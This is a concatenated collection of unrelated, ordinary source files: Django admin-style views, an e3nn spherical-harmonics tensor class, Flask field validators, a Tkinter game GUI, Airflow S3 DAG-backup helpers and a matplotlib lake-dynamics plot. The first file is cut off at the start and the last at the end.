        return self.component.inline_classes

    def has_perm(self):
        """Check the component permission, passing the object when one exists."""
        try:
            obj = self.get_object()
        except AttributeError:
            # List-style views have no get_object; check without an object.
            obj = None
        return self.component.has_perm(self.request.user, obj)

    def handle_no_permission(self):
        """Raise for authenticated users, redirect anonymous ones to login."""
        if self.request.user.is_authenticated:
            raise PermissionDenied("You shall not pass")
        # Inner import to prevent django.contrib.admin (app) from
        # importing django.contrib.auth.models.User (unrelated model).
        from django.contrib.auth.views import redirect_to_login
        return redirect_to_login(self.request.get_full_path())

    def dispatch(self, request, *args, **kwargs):
        # Check permission before any handler runs.
        if not self.has_perm():
            return self.handle_no_permission()
        return super().dispatch(request, *args, **kwargs)
class InlinesMixin(ContextMixin):
    """Mixin that instantiates the view's related inlines and puts them in context."""

    inline_classes: List[Type[RelatedInline]] = []

    def get_inline_classes(self):
        return self.inline_classes

    def get_inlines(self, object=None):
        """Build one inline instance per class, bound to *object* (or self.object)."""
        inlines = []
        for inline_class in self.get_inline_classes():
            inlines.append(
                inline_class(
                    parent_instance=object if object is not None else self.object,
                    parent_model=self.model,
                    request=self.request,
                )
            )
        return inlines

    def get_context_data(self, **kwargs):
        # Don't overwrite inlines explicitly passed by the caller.
        if "inlines" not in kwargs:
            kwargs["inlines"] = self.get_inlines()
        return super().get_context_data(**kwargs)
class CreateWithInlinesMixin(InlinesMixin):
    """Create-view support for validating and saving a form with its inline formsets."""

    def post(self, request, *args, **kwargs):
        self.object = None
        form_class = self.get_form_class()
        form = self.get_form(form_class)
        if form.is_valid():
            # we have to make sure that the same instance is used for form and inlines
            inlines = self.get_inlines(object=form.save(commit=False))
        else:
            inlines = self.get_inlines()
        # Both the form and every inline formset must validate before saving.
        if all_valid(inline.formset for inline in inlines) and form.is_valid():
            return self.form_valid(form, inlines)
        return self.form_invalid(form, inlines)

    def form_valid(self, form, inlines):
        # Save the parent first so the formsets reference a persisted object.
        self.object = form.save()
        for inline in inlines:
            inline.formset.save()
        return redirect(self.get_success_url())

    def form_invalid(self, form, inlines):
        return self.render_to_response(
            self.get_context_data(form=form, inlines=inlines)
        )
class UpdateWithInlinesMixin(InlinesMixin):
    """Update-view support for validating and saving a form with its inline formsets."""

    def post(self, request, *args, **kwargs):
        self.object = self.get_object()
        form_class = self.get_form_class()
        form = self.get_form(form_class)
        inlines = self.get_inlines()
        # Both the form and every inline formset must validate before saving.
        if form.is_valid() and all_valid(inline.formset for inline in inlines):
            return self.form_valid(form, inlines)
        return self.form_invalid(form, inlines)

    def form_valid(self, form, inlines):
        self.object = form.save()
        for inline in inlines:
            inline.formset.save()
        return redirect(self.get_success_url())

    def form_invalid(self, form, inlines):
        return self.render_to_response(
            self.get_context_data(form=form, inlines=inlines)
        )
class CreateView(ComponentMixin, CreateWithInlinesMixin, generic.CreateView):
    """Create view with inline support, a success message and popup handling."""

    def get_template_names(self):
        # Beam's default template is a fallback after any user-provided ones.
        return super().get_template_names() + ["beam/create.html"]

    def get_success_url(self):
        return self.viewset.links["detail"].reverse(
            obj=self.object, request=self.request
        )

    def get_success_message(self):
        return _('The {model} "{name}" was added successfully.').format(
            model=self.model._meta.verbose_name,
            name=str(self.object),
        )

    def form_valid(self, form, inlines):
        response = super().form_valid(form, inlines)
        success_message = self.get_success_message()
        if success_message:
            messages.success(self.request, success_message)
        if self.request.GET.get("_popup"):
            # Opened from a popup (e.g. a related-object widget): notify the opener.
            return self.popup_response()
        return response

    def popup_response(self):
        """Return a page that posts the created object back to window.opener and closes."""
        return HttpResponse(
            "<script>"
            "window.opener.postMessage("
            '{{id: "{id}", result: "created", source: "{source}", text: "{text}"}}, '
            "document.origin"
            ");"
            "window.close()"
            "</script>".format(
                id=escape(self.object.pk),
                source=escape(self.request.GET["_popup"]),
                text=escape(str(self.object)),
            )
        )
class UpdateView(ComponentMixin, UpdateWithInlinesMixin, generic.UpdateView):
    """Update view with inline support and a success message."""

    def get_template_names(self):
        return super().get_template_names() + ["beam/update.html"]

    def get_success_message(self):
        return _('The {model} "{name}" was changed successfully.').format(
            model=self.model._meta.verbose_name,
            name=str(self.object),
        )

    def form_valid(self, form, inlines):
        response = super().form_valid(form, inlines)
        success_message = self.get_success_message()
        if success_message:
            messages.success(self.request, success_message)
        return response

    def get_success_url(self):
        # "Save and continue editing" stays on the current page.
        if self.request.POST.get("submit", None) == "save_and_continue_editing":
            return self.request.get_full_path()
        return self.viewset.links["detail"].reverse(
            obj=self.object, request=self.request
        )
class SortableListMixin(ComponentMixin):
    """List-view mixin implementing ``?o=field,-other`` style ordering."""

    sort_param = "o"  # query-string parameter carrying the sort spec
    sort_separator = ","

    def get_sort_fields(self):
        """Return sortable field names, validating explicit configuration eagerly."""
        if self.component.list_sort_fields is None:
            return [
                # cast to string to support virtual fields
                str(field)
                for field in self.component.fields
                if self.get_sort_column_for_field(str(field))
            ]
        for field in self.component.list_sort_fields:
            if self.get_sort_column_for_field(field) is None:
                raise Exception(
                    "Unable to determine sort column for explicit sort field {} on {}".format(
                        field, self.viewset
                    )
                )
        return self.component.list_sort_fields

    def get_sort_fields_columns(self):
        return self.component.list_sort_fields_columns or {}

    def get_sort_column_for_field(self, field_name):
        """Map a display field to a database column; None when not sortable."""
        explicit = self.get_sort_fields_columns()
        if field_name in explicit:
            return explicit[field_name]
        try:
            field = self.model._meta.get_field(field_name)
            return field.name
        except FieldDoesNotExist:
            return None

    def get_sort_fields_from_request(self) -> List[str]:
        """Parse the sort query parameter, keeping only allowed fields (with sign)."""
        fields = []
        sort_fields = set(self.get_sort_fields())
        for field in self.request.GET.get(self.sort_param, "").split(
            self.sort_separator
        ):
            if field.startswith("-"):
                sort_field = field[1:]
            else:
                sort_field = field
            if sort_field in sort_fields:
                fields.append(field)
        return fields

    def get_sort_columns(self, fields):
        """Translate (possibly ``-``-prefixed) field names into order_by() columns."""
        columns = []
        for field in fields:
            if field.startswith("-"):
                descending = True
                field = field[1:]
            else:
                descending = False
            column = self.get_sort_column_for_field(field)
            if not column:
                # Silently skip fields without a resolvable column.
                continue
            columns.append("-" + column if descending else column)
        return columns

    def sort_queryset(self, qs):
        current_sort_fields = self.get_sort_fields_from_request()
        current_sort_columns = self.get_sort_columns(current_sort_fields)
        if current_sort_columns:
            qs = qs.order_by(*current_sort_columns)
        return qs

    def get_queryset(self):
        qs = super().get_queryset()
        return self.sort_queryset(qs)

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["sortable_fields"] = set(self.get_sort_fields())
        context["sorted_fields"] = self.get_sort_fields_from_request()
        return context
class FiltersetMixin(ComponentMixin):
    """List-view mixin applying a django-filter FilterSet from the component config."""

    filterset_class = None  # explicit view-level override
    filterset_fields = None
    filterset = None  # bound instance, assigned in dispatch()

    def get_filterset_fields(self):
        if self.filterset_fields is not None:
            return self.filterset_fields
        return self.component.list_filterset_fields

    def get_filterset_class(self):
        """Resolve the filterset: view override, component class, or factory-built."""
        if self.filterset_class:
            return self.filterset_class
        if self.component.list_filterset_class:
            return self.component.list_filterset_class
        elif self.component.list_filterset_fields:
            return filterset_factory(
                model=self.model, fields=self.get_filterset_fields()
            )
        return None

    def get_filterset_kwargs(self):
        """
        Returns the keyword arguments for instantiating the filterset.
        """
        kwargs = {
            "data": self.request.GET or None,
            "request": self.request,
            "prefix": "filter",
            "queryset": self.component.queryset,
        }
        return kwargs

    def get_filterset(self):
        filterset_class = self.get_filterset_class()
        if not filterset_class:
            return None
        return filterset_class(**self.get_filterset_kwargs())

    def get_queryset(self):
        qs = super().get_queryset()
        # Only filter when the filterset is bound to data and validates.
        if self.filterset and self.filterset.is_bound and self.filterset.is_valid():
            qs = self.filterset.filter_queryset(qs)
        return qs

    def dispatch(self, request, *args, **kwargs):
        self.filterset = self.get_filterset()
        return super().dispatch(request, *args, **kwargs)

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["filterset"] = self.filterset
        return context
class InlineActionMixin(InlinesMixin):
    """Detail-view mixin dispatching bulk actions POSTed from inline tables.

    NOTE(review): get_action_qs mirrors ListActionsMixin.get_action_qs — keep in sync.
    """

    def get_action_qs(self, inline):
        """Objects of *inline* the action applies to; empty queryset on a selection race."""
        ids = self.request.POST.getlist("_action_select[]")
        select_across = self.request.POST.get("_action_select_across") == "all"
        objects = inline.get_queryset()
        if not select_across:
            objects = objects.filter(pk__in=ids)
        if not select_across and len(objects) != len(ids):
            # A selected object disappeared (e.g. deleted concurrently): abort.
            messages.error(
                self.request,
                _(
                    "There was an error finding the objects you selected. "
                    "This could be caused by another user changing them concurrently. "
                    "Please try again."
                ),
            )
            return objects.none()
        return objects

    def get_action(self):
        """Return (inline, bound action) for the submitted action, else (None, None)."""
        for inline in self.get_inlines(self.get_object()):
            action = inline.get_action()
            if action and action.is_bound:
                return inline, action
        return None, None

    def handle_action(self, inline, action):
        """Apply *action* to its queryset; None means its form was invalid."""
        form = action.get_form()
        if form and not form.is_valid():
            return None
        result: Optional[HttpResponse] = action.apply(
            queryset=self.get_action_qs(inline)
        )
        success_message: str = action.get_success_message()
        if success_message:
            messages.success(self.request, success_message)
        if result:
            return result
        return redirect(self.request.get_full_path())

    def post(self, request, *args, **kwargs):
        inline, action = self.get_action()
        if action:
            response = self.handle_action(inline, action)
            if response:
                return response
        # No action (or an invalid action form): re-render the page.
        return self.get(request, *args, **kwargs)
class ListActionsMixin(ComponentMixin):
    """List-view mixin that renders and dispatches bulk actions.

    NOTE(review): get_action_qs mirrors InlineActionMixin.get_action_qs — keep in sync.
    """

    component: ListComponent

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["actions"] = self.actions
        return context

    def get_action_qs(self):
        """Objects the selected action applies to; empty queryset on a selection race."""
        ids = self.request.POST.getlist("_action_select[]")
        select_across = self.request.POST.get("_action_select_across") == "all"
        objects = self.get_queryset()
        if not select_across:
            objects = objects.filter(pk__in=ids)
        if not select_across and len(objects) != len(ids):
            # A selected object disappeared (e.g. deleted concurrently): abort.
            messages.error(
                self.request,
                _(
                    "There was an error finding the objects you selected. "
                    "This could be caused by another user changing them concurrently. "
                    "Please try again."
                ),
            )
            return objects.none()
        return objects

    def get_actions(self):
        """Instantiate permitted actions; bind POST data only to the chosen one."""
        selected_action = self.request.POST.get("_action_choice")
        actions = []
        action_class: Type[Action]
        for index, action_class in enumerate(self.component.list_actions_classes):
            action_id = "{}-{}".format(index, action_class.name)
            action = action_class(
                data=self.request.POST if action_id == selected_action else None,
                model=self.model,
                id=action_id,
                request=self.request,
            )
            if action.has_perm(self.request.user):
                actions.append(action)
        return actions

    def get_action(self):
        for action in self.actions:
            if action.is_bound:
                return action
        return None

    def handle_action(self, action):
        """Apply *action* to its queryset; None means its form was invalid."""
        form = action.get_form()
        if form and not form.is_valid():
            return None
        result: Optional[HttpResponse] = action.apply(queryset=self.get_action_qs())
        success_message: str = action.get_success_message()
        if success_message:
            messages.success(self.request, success_message)
        if result:
            return result
        return redirect(self.request.get_full_path())

    def dispatch(self, request, *args, **kwargs):
        self.actions = self.get_actions()
        return super().dispatch(request, *args, **kwargs)

    def post(self, request, *args, **kwargs):
        action = self.get_action()
        if action:
            response = self.handle_action(action)
            if response:
                return response
        # No action (or an invalid action form): re-render the list.
        return self.get(request, *args, **kwargs)
class ListView(
    ListActionsMixin,
    FiltersetMixin,
    SearchableListMixin,
    SortableListMixin,
    ComponentMixin,
    generic.ListView,
):
    """Component list view combining bulk actions, filtering, search and sorting."""

    @property
    def search_fields(self):
        return self.component.list_search_fields

    def get_paginate_by(self, queryset):
        return self.component.list_paginate_by

    def get_search_query(self):
        # Skip SearchableListMixin filtering when no search fields are configured.
        if not self.search_fields:
            return ""
        return super().get_search_query()

    def get_template_names(self):
        return super().get_template_names() + ["beam/list.html"]

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        context["search_query"] = self.get_search_query()
        context["list_item_link_layout"] = self.component.list_item_link_layout
        return context
class DetailView(InlineActionMixin, ComponentMixin, InlinesMixin, generic.DetailView):
    """Object detail page with inline tables and their bulk actions."""

    def get_template_names(self):
        """Append beam's default detail template as a fallback."""
        names = super().get_template_names()
        return names + ["beam/detail.html"]
class DeleteView(ComponentMixin, InlinesMixin, generic.DeleteView):
    """Delete confirmation view listing cascading and protected related objects."""

    def get_template_names(self):
        return super().get_template_names() + ["beam/delete.html"]

    def get_success_url(self):
        return self.viewset.links["list"].reverse(request=self.request)

    def get_success_message(self):
        return _('The {model} "{name}" was deleted successfully.').format(
            model=self.model._meta.verbose_name, name=str(self.object)
        )

    def post(self, request, *args, **kwargs):
        self.object = self.get_object()
        # Refuse deletion outright when protected (PROTECT FK) objects block it.
        nested, protected = self.get_nested_objects(self.object)
        if protected:
            return HttpResponseForbidden()
        # Build the message before delete() runs, while the object still exists.
        success_message = self.get_success_message()
        response = self.delete(request, *args, **kwargs)
        if success_message:
            messages.success(request, success_message)
        return response

    @classmethod
    def get_nested_objects(cls, obj):
        """Collect objects that would cascade with *obj* and those protecting it."""
        using = router.db_for_write(cls.model)
        collector = NestedObjects(using=using)
        collector.collect([obj])
        nested = collector.nested(cls._format_obj)
        return nested, list(map(cls._format_obj, collector.protected))

    @staticmethod
    def _format_obj(obj):
        """Human-readable label: verbose name plus str() of the object."""
        return '%s "%s"' % (obj._meta.verbose_name, str(obj))

    def get_context_data(self, **kwargs):
        context = super(DeleteView, self).get_context_data(**kwargs)
        nested, protected = self.get_nested_objects(self.get_object())
        context.update(
            {
                "object": self.object,
                "object_name": self._format_obj(self.object),
                "nested_objects": nested,
                "protected_objects": protected,
            }
        )
        return context
class DashboardView(TemplateView):
    """Admin-style dashboard listing registered viewsets grouped by Django app."""

    template_name = "beam/dashboard.html"
    viewsets = None  # explicit viewsets; falls back to the default registry
    registry = default_registry

    def build_registry(self, viewsets):
        """Build an ad-hoc registry from an explicit list of viewsets."""
        registry = {}
        for viewset in viewsets:
            register(registry, viewset)
        return registry

    def get_registry(self):
        if self.viewsets:
            return self.build_registry(self.viewsets)
        else:
            return self.registry

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        grouped = []
        # Registry maps app_label -> {name: viewset}; group for the template.
        for app_label, viewsets_dict in self.get_registry().items():
            group = {
                "app_label": app_label,
                "app_config": apps.get_app_config(app_label),
                "viewsets": viewsets_dict.values(),
            }
            grouped.append(group)
        context["grouped_by_app"] = grouped
        return context
| 19,976 | 5,592 |
# pylint: disable=not-callable, no-member, invalid-name, line-too-long, missing-docstring, arguments-differ
import numpy as np
import torch
from e3nn import rs
from e3nn.kernel_mod import FrozenKernel
from e3nn.tensor.spherical_tensor import projection
class FourierTensor:
    """Spherical-harmonics (Fourier) coefficients F^l of a signal on S^2 x R+."""

    def __init__(self, signal, mul, lmax, p_val=0, p_arg=0):
        """
        f: s2 x r -> R^N

        Rotations
            [D(g) f](x) = f(g^{-1} x)
        Parity
            [P f](x) = p_val f(p_arg x)

        f(x) = sum F^l . Y^l(x)

        This class contains the F^l

        Rotations
            [D(g) f](x) = sum [D^l(g) F^l] . Y^l(x)  (using equiv. of Y and orthogonality of D)
        Parity
            [P f](x) = sum [p_val p_arg^l F^l] . Y^l(x)  (using parity of Y)

        :param signal: tensor whose last dimension equals mul * (lmax + 1)**2
        :param mul: multiplicity of each irreducible representation
        :param lmax: maximal order of the signal
        :param p_val, p_arg: parity of the value and of the argument
        :raises ValueError: when the last dimension of ``signal`` is inconsistent
        """
        if signal.shape[-1] != mul * (lmax + 1)**2:
            raise ValueError(
                "Last tensor dimension and Rs do not have same dimension.")
        self.signal = signal
        self.lmax = lmax
        self.mul = mul
        self.Rs = rs.convention([(mul, l, p_val * p_arg**l)
                                 for l in range(lmax + 1)])
        self.radial_model = None

    @classmethod
    def from_geometry(cls, vectors, radial_model, lmax, sum_points=True):
        """Build the Fourier coefficients of a point cloud.

        :param vectors: tensor of shape [..., xyz]
        :param radial_model: function of signature R+ -> R^mul
        :param lmax: maximal order of the signal
        :param sum_points: sum the per-point contributions when True
        """
        size = vectors.shape[:-1]
        vectors = vectors.reshape(-1, 3)  # [N, 3]
        radii = vectors.norm(2, -1)
        radial_functions = radial_model(radii)
        *_size, R = radial_functions.shape
        Rs = [(R, L) for L in range(lmax + 1)]
        mul_map = rs.map_mul_to_Rs(Rs)
        # Repeat the radial profile across all L's and scatter to signal layout.
        radial_functions = torch.einsum('nr,dr->nd',
                                        radial_functions.repeat(1, lmax + 1),
                                        mul_map)  # [N, signal]
        # NOTE(review): a zero-length vector makes radii == 0 and divides by
        # zero below — assumes inputs exclude the origin; confirm.
        Ys = projection(vectors / radii.unsqueeze(-1), lmax)  # [N, l * m]
        irrep_map = rs.map_irrep_to_Rs(Rs)
        Ys = torch.einsum('nc,dc->nd', Ys, irrep_map)  # [N, l * mul * m]
        signal = Ys * radial_functions  # [N, l * mul * m]
        if sum_points:
            signal = signal.sum(0)
        else:
            signal = signal.reshape(*size, -1)
        new_cls = cls(signal, R, lmax)
        new_cls.radial_model = radial_model
        return new_cls

    def plot(self, box_length, center=None, n=30,
             radial_model=None, relu=True):
        """Evaluate the signal on an n^3 cubic grid; returns (points, values)."""
        muls, _ls, _ps = zip(*self.Rs)
        # We assume radial functions are repeated across L's
        assert len(set(muls)) == 1
        num_L = len(self.Rs)
        if radial_model is None:
            radial_model = self.radial_model

        def new_radial(x):
            return radial_model(x).repeat(1, num_L)  # Repeat along filter dim

        r, f = plot_on_grid(box_length, new_radial, self.Rs, n=n)
        # Contract the per-point basis values with the stored coefficients.
        f = torch.einsum('xd,d->x', f, self.signal)
        f = f.relu() if relu else f
        if center is not None:
            r += center.unsqueeze(0)
        return r, f

    def change_lmax(self, lmax):
        """Return an equivalent tensor truncated or zero-padded to ``lmax``."""
        new_Rs = [(self.mul, l) for l in range(lmax + 1)]
        if self.lmax == lmax:
            return self
        elif self.lmax > lmax:
            new_signal = self.signal[:rs.dim(new_Rs)]
            return FourierTensor(new_signal, self.mul, lmax)
        else:
            new_signal = torch.zeros(rs.dim(new_Rs))
            new_signal[:rs.dim(self.Rs)] = self.signal
            return FourierTensor(new_signal, self.mul, lmax)

    def __add__(self, other):
        """Add two signals, promoting both operands to the larger lmax."""
        if self.mul != other.mul:
            raise ValueError("Multiplicities do not match.")
        lmax = max(self.lmax, other.lmax)
        new_self = self.change_lmax(lmax)
        new_other = other.change_lmax(lmax)
        # Bug fix: the result must carry the promoted lmax. The previous code
        # passed self.lmax, producing an inconsistent (signal, lmax) pair —
        # and a ValueError in __init__ — whenever other.lmax > self.lmax.
        return FourierTensor(new_self.signal + new_other.signal, self.mul, lmax)
def plot_on_grid(box_length, radial_model, Rs, n=30):
    """Evaluate a scalar-input kernel on an n^3 cube of side ``box_length``.

    :param box_length: edge length of the sampling cube (centred on origin)
    :param radial_model: radial function handed to the kernel
    :param Rs: output representation list of the kernel
    :param n: number of samples per axis
    :return: tuple (r, f) of grid points [n^3, 3] and kernel values
    """
    # Removed dead code: the original computed an ``l_to_index`` table from
    # ``Rs`` that was never read.
    r = np.mgrid[-1:1:n * 1j, -1:1:n * 1j, -1:1:n * 1j].reshape(3, -1)
    r = r.transpose(1, 0)
    r *= box_length / 2.
    r = torch.from_numpy(r)
    Rs_in = [(1, 0)]
    Rs_out = Rs

    def radial_lambda(_ignored):
        # FrozenKernel expects a factory; always hand back the same model.
        return radial_model

    grid = FrozenKernel(Rs_in, Rs_out, radial_lambda, r)
    f = grid()
    f = f[..., 0]
    return r, f
| 4,557 | 1,681 |
import re
from flask import make_response, jsonify
"""
Validates key-value pairs of request dictionary body.
"""
def validate_users_key_pair_values(request):
    """Return the required user fields that are absent from the JSON body."""
    required_fields = ('firstName', 'lastName', 'userName', 'email',
                       'phoneNumber', 'password')
    body = request.json
    return [field for field in required_fields if field not in body]
"""
Validates key-value pairs of request dictionary body.
"""
def validate_videos_key_pair_values(request):
    """Return the required video fields that are absent from the JSON body."""
    required_fields = ('title', 'description', 'video_content')
    body = request.json
    return [field for field in required_fields if field not in body]
def check_for_blanks(data):
    """Return the keys of *data* whose values are the empty string."""
    return [key for key, value in data.items() if value == ""]
def check_for_non_strings(data):
    """Return keys (other than 'id') whose values are not strings."""
    return [key for key, value in data.items()
            if key != 'id' and not isinstance(value, str)]
def check_for_non_ints(data):
    """Return the keys whose values are not integers.

    Note: ``bool`` is a subclass of ``int``, so boolean values pass.
    """
    return [key for key, value in data.items() if not isinstance(value, int)]
from tkinter import *
from agents.baseAgent import baseAgent
class guiPlayerAgent(baseAgent):
    '''Extends baseAgent to provide a Tkinter GUI for a human player.

    The board is rendered as a grid of buttons; getMove() blocks inside a
    manual Tk event-pump loop until the user clicks a cell.
    '''
    def __init__(self,*args,**kwargs):
        super().__init__(*args,**kwargs)
        # Window initialization: a single fixed-size, non-resizable window
        # holding one stretchable frame that will contain the button grid.
        self.window = Tk()
        self.window.resizable(0,0)
        self.window.title("5 Line Game V2.2 - guiPlayerAgent")
        self.frame=Frame(self.window)
        Grid.rowconfigure(self.window, 0, weight=1)
        Grid.columnconfigure(self.window, 0, weight=1)
        self.frame.grid(row=0, column=0, sticky=N+S+E+W)
        Grid.rowconfigure(self.frame, 0, weight=1)
        Grid.columnconfigure(self.frame, 0, weight=1)
        # actual extensions
        self.input = None  # last clicked (x, y) coordinate, or None while waiting
        self.btns = []     # 2D list of Buttons indexed [y][x]; filled by btninit()
        # Shrink the cell size until the whole board fits inside a
        # maxSize x maxSize window.
        maxSize = 600
        unit = maxSize/3
        xSize = self.state.length()*unit
        ySize = self.state.height()*unit
        while(xSize > maxSize or ySize > maxSize):
            unit -= 1
            xSize = self.state.length()*unit
            ySize = self.state.height()*unit
        self.window.geometry("%dx%d"%(xSize,ySize))
        return
    # helper functions
    # enables all buttons
    def enable(self):
        '''Enables all grid buttons.'''
        for y in range(self.state.height()):
            for x in range(self.state.length()):
                self.btns[y][x].configure(state=NORMAL)
        return
    # disables all buttons
    def disable(self):
        '''Disables all grid buttons.'''
        for y in range(self.state.height()):
            for x in range(self.state.length()):
                self.btns[y][x].configure(state=DISABLED)
        return
    # changes/setups button texts
    def btnupdate(self):
        '''Updates grid buttons to represent current self.state.'''
        # Lazily build the button grid the first time the board is drawn.
        if self.btns == []:
            self.btninit()
        grid = self.state.grid()
        for y in range(self.state.height()):
            for x in range(self.state.length()):
                self.btns[y][x].configure(text=grid[y][x])
        return
    # handler for buttons
    def passInput(self,coord):
        '''Click handler for grid buttons; records the clicked coordinate.'''
        self.input = coord
        return
    # setup buttons in grid and gives them above handler
    def btninit(self):
        '''Creates grid of buttons.'''
        for y in range(self.state.height()):
            row = []
            for x in range(self.state.length()):
                # coord=(x,y) is bound as a default argument so each button
                # captures its own coordinate (avoids the late-binding pitfall).
                btn = Button(self.frame,text=" ",height=1,width=1,command=lambda coord=(x,y): self.passInput(coord))
                btn.grid(column=x, row=y, sticky=N+S+E+W)
                btn.configure(state=DISABLED)
                row.append(btn)
            self.btns.append(row)
        # Let every row/column stretch equally with the window.
        for x in range(self.state.length()):
            Grid.columnconfigure(self.frame, x, weight=1)
        for y in range(self.state.height()):
            Grid.rowconfigure(self.frame, y, weight=1)
        return
    # extendables
    # setter
    def update(self,state,curPiece):
        '''Refreshes the stored state and redraws the board.'''
        super().update(state,curPiece)
        self.btnupdate()
        self.window.update()
        return
    # getter
    def getMove(self,state):
        '''Blocks until the user clicks a cell; returns its (x, y) coordinate.'''
        super().getMove(state)
        self.input = None
        self.enable()
        # Manual event pump: keep the window responsive until a click handler
        # sets self.input.
        while(self.input == None):
            self.window.update()
        self.disable()
        return self.input
| 3,395 | 1,036 |
import os
import subprocess
from airflow.exceptions import AirflowException
from airflow import configuration as conf
def backup_folder_exists():
    """Return True when the S3 dags_backup folder contains at least one entry."""
    import commands
    base_path = conf.get('core', 'REMOTE_BASE_LOG_FOLDER')
    if not base_path.startswith('s3://'):
        raise AirflowException("There seems to be some problem with your defloc location")
    backup_loc = base_path + '/dags_backup/'
    # Count the listing lines; "0" means the folder is empty or missing.
    listing_cmd = 's3cmd ls -c /usr/lib/hustler/s3cfg {} | wc -l'.format(backup_loc)
    line_count = commands.getoutput(listing_cmd)
    return line_count != '0'
def untar_and_save_dags(tempDir):
    """Extract tempDir/dags.tar.gz into $AIRFLOW_HOME/dags/ (created if absent)."""
    import commands
    airflow_home = os.environ['AIRFLOW_HOME']
    dags_dir = airflow_home + "/dags"
    if not os.path.exists(dags_dir):
        os.makedirs(dags_dir)
    extract_cmd = "tar -vxzf {}/dags.tar.gz -C {}/dags/".format(tempDir, airflow_home)
    commands.getoutput(cmd=extract_cmd)
def pull_from_s3(remote_loc, localDir):
    """Download *remote_loc* from S3 into *localDir* via s3cmd, overwriting.

    :param remote_loc: s3:// URL of the object to fetch
    :param localDir: local destination directory (trailing slash is appended)
    """
    execute_cmd = ['s3cmd', 'get', '-c', '/usr/lib/hustler/s3cfg']
    execute_cmd.extend([remote_loc, localDir + '/', '--force'])
    process = subprocess.Popen(execute_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # Bug fix: communicate() drains stdout/stderr before waiting. Using
    # wait() alone with PIPEs can deadlock once the child fills a pipe buffer.
    process.communicate()
def push_to_s3(dags_folder):
    """Upload ./dags.tar.gz to the S3 dags_backup folder via s3cmd.

    :param dags_folder: unused legacy parameter, kept for callers.
    """
    remote_base_path = conf.get('core', 'REMOTE_BASE_LOG_FOLDER')
    remote_loc = remote_base_path + '/dags_backup/'
    execute_cmd = ['s3cmd', 'put', '-c', '/usr/lib/hustler/s3cfg']
    execute_cmd.extend(['dags.tar.gz', remote_loc])
    process = subprocess.Popen(execute_cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    # Bug fix: communicate() drains stdout/stderr before waiting. Using
    # wait() alone with PIPEs can deadlock once the child fills a pipe buffer.
    process.communicate()
| 1,802 | 649 |
#!/usr/bin/env python
#-*- coding=utf-8 -*-
def function1():
    # Demo function; Python 2 print-statement syntax (this module is py2-only).
    print "function1 running"
# Report whether this module is executed directly or imported (Python 2 syntax).
if __name__ == "__main__":
    print "mymodule1 running as main program"
else:
    print "mymodule1 initializing"
| 209 | 79 |
import matplotlib.pyplot as plt
from scipy.optimize import root
import matplotlib
import numpy as np
def makeFigure1():
    """Plot lake P flux diagrams for varying q (panel a) and b (panel b);
    saves the result as Figure1.pdf."""
    def fun(x):
        # Fixed-point residual: sigmoidal recycling inflow minus linear
        # outflow b*x. ``bb`` and ``qq`` are read from the enclosing scope at
        # call time, so they must be (re)assigned before each root() call.
        return [(x[0]**qq)/(1+x[0]**qq) - bb*x[0]]
    b = [0.4,0.3,0.2,0.1]
    q = [2.5,3,3.5,4]
    x = np.arange(0,2.6,0.1)
    y = np.zeros(len(x))
    # NOTE(review): matplotlib.cm.get_cmap is deprecated in newer matplotlib;
    # works on the versions this script targets.
    cmap = matplotlib.cm.get_cmap('RdYlGn')
    fig = plt.figure()
    ax = fig.add_subplot(2,1,1)
    # for b = 0.4, plot different values of q
    colors = []
    for i in range(len(b)):
        colors.append(cmap(0.25*(i+1)))
    lines=[]
    line1, = ax.plot(x,b[0]*x,c='k', linewidth=2)
    lines.append(line1)
    for j in range(len(q)):
        for i in range(len(x)):
            y[i] = x[i]**q[j]/(1+x[i]**q[j])
        line1, = ax.plot(x, y, c = colors[j], linewidth=2)
        lines.append(line1)
        bb = b[0]
        qq = q[j]
        # Hollow marker: unstable interior equilibrium (root near x=1).
        soln = root(fun,1.0)
        lines.append(ax.scatter(soln.x,b[0]*soln.x,facecolor='none',edgecolor='k',s=30))
        # Filled marker: stable upper equilibrium (root near x=2.5).
        soln = root(fun,2.5)
        lines.append(ax.scatter(soln.x,b[0]*soln.x,facecolor='k',edgecolor='k',s=30))
    lines.append(ax.scatter(0,0,facecolor='k',edgecolor='k',s=30))
    # lines[1], [4], [7], [10] are the four q-curves (3 artists appended per loop).
    legend1 = plt.legend([lines[0], lines[1], lines[4], lines[7], lines[10]],\
        ['b = 0.4', 'q = 2.5', 'q = 3.0', 'q = 3.5', 'q = 4.0'], loc='lower right')
    plt.setp(legend1.get_title(),fontsize=14)
    plt.gca().add_artist(legend1)
    plt.legend([lines[3], lines[2]],['Stable Equilibria','Unstable Equilibria'],loc='upper left')
    ax.set_ylabel('Fluxes of P',fontsize=16)
    ax.tick_params(axis='y',labelsize=14)
    ax.set_xlim(0,2.5)
    ax.set_ylim(0,1)
    ax.set_title('a) Effect of q on Lake Dynamics',loc='left')
    ax = fig.add_subplot(2,1,2)
    colors = []
    for i in range(len(b)):
        colors.append(cmap(1-(0.25*i)))
    # for q = 2.5, plot different values of b
    for i in range(len(x)):
        y[i] = x[i]**q[0]/(1+x[i]**q[0])
    lines = []
    line1, = ax.plot(x,y,c='k',label='q = ' + str(q[0]),linewidth=2)
    lines.append(line1)
    for i in range(len(b)):
        line1, = ax.plot(x,b[i]*x,c=colors[i],label='b = ' + str(b[i]),linewidth=2)
        lines.append(line1)
        bb = b[i]
        qq = q[0]
        soln = root(fun,1.0)
        lines.append(ax.scatter(soln.x,b[i]*soln.x,facecolor='none',edgecolor='k',s=30))
        soln = root(fun,2.5)
        lines.append(ax.scatter(soln.x,b[i]*soln.x,facecolor='k',edgecolor='k',s=30))
    lines.append(ax.scatter(0,0,facecolor='k',edgecolor='k',s=30))
    ax.legend([lines[0], lines[1], lines[4], lines[7], lines[10]],\
        ['q = 2.5', 'b = 0.4', 'b = 0.3', 'b = 0.2', 'b = 0.1'],\
        scatterpoints = 1, loc='upper left')
    ax.set_xlabel('Lake P Concentration,$X_t$',fontsize=16)
    ax.set_ylabel('Fluxes of P',fontsize=16)
    ax.tick_params(axis='both',labelsize=14)
    ax.set_xlim(0,2.5)
    ax.set_ylim(0,1)
